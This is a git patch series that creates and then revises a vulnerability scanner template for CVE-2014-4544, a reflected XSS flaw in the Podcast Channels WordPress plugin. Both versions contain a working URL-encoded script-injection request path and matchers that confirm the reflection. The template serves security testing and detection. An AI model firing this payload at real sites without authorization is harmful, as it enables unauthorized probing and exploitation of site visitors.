From ae58e1e6129dfa5de121d8254d39c241bc83c480 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sat, 25 Sep 2021 07:49:53 +0700
Subject: [PATCH 1/2] Create CVE-2014-4544.yaml

---
 cves/2014/CVE-2014-4544.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 cves/2014/CVE-2014-4544.yaml

diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml
new file mode 100644
index 0000000000..a8380ef6d9
--- /dev/null
+++ b/cves/2014/CVE-2014-4544.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4544
+
+info:
+  name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
+  tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E&"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'><script>alert(document.cookie)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

From e339d5a0e83641840cf99697a7d77c8502bca854 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sat, 25 Sep 2021 11:19:46 +0530
Subject: [PATCH 2/2] Update CVE-2014-4544.yaml

---
 cves/2014/CVE-2014-4544.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml
index a8380ef6d9..1d16c52c78 100644
--- a/cves/2014/CVE-2014-4544.yaml
+++ b/cves/2014/CVE-2014-4544.yaml
@@ -4,6 +4,7 @@ info:
   name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
   author: daffainfo
   severity: medium
+  description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
   reference:
     - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
@@ -12,13 +13,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E&"
+      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "'><script>alert(document.cookie)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word